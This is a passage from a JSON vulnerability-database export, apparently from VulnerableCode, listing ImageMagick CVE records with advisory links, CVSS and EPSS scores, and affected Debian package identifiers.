"reference_id": "972797", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=972797" }, { "reference_url": "https://usn.ubuntu.com/4670-1/", "reference_id": "USN-4670-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4670-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27560" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8yfc-gunh-17a2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80604?format=api", "vulnerability_id": "VCID-92es-dtbz-tqae", "summary": "ImageMagick: Division by zero in GetResizeFilterWeight in MagickCore/resize.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20243.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20243.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20243", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31726", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31538", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31741", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31709", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31857", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31901", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.3172", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31772", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31801", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31805", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31765", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.3173", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31762", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20243" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20243", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20243" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928958", "reference_id": "1928958", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928958" }, { "reference_url": "https://security.archlinux.org/AVG-1579", "reference_id": "AVG-1579", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1579" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/7164-1/", "reference_id": "USN-7164-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7164-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20243" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-92es-dtbz-tqae" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80619?format=api", "vulnerability_id": "VCID-9h1k-h8gw-hkat", "summary": "ImageMagick: Division by zero in WriteAnimatedWEBPImage() in coders/webp.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20245.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20245.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20245", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46152", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46194", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46213", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.4616", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46217", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46219", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46243", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46214", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46224", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46279", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46276", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.4622", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00234", "scoring_system": "epss", "scoring_elements": "0.46202", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20245" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20245", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20245" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928943", "reference_id": "1928943", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928943" }, { "reference_url": "https://security.archlinux.org/AVG-1579", "reference_id": "AVG-1579", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1579" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20245" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9h1k-h8gw-hkat" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82059?format=api", "vulnerability_id": "VCID-acgu-hc83-yubn", "summary": "ImageMagick: memory leak in coders/dot.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16713.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16713.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41284", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41194", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41365", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41409", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41306", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41376", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41405", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41332", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41383", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.4139", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41379", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", 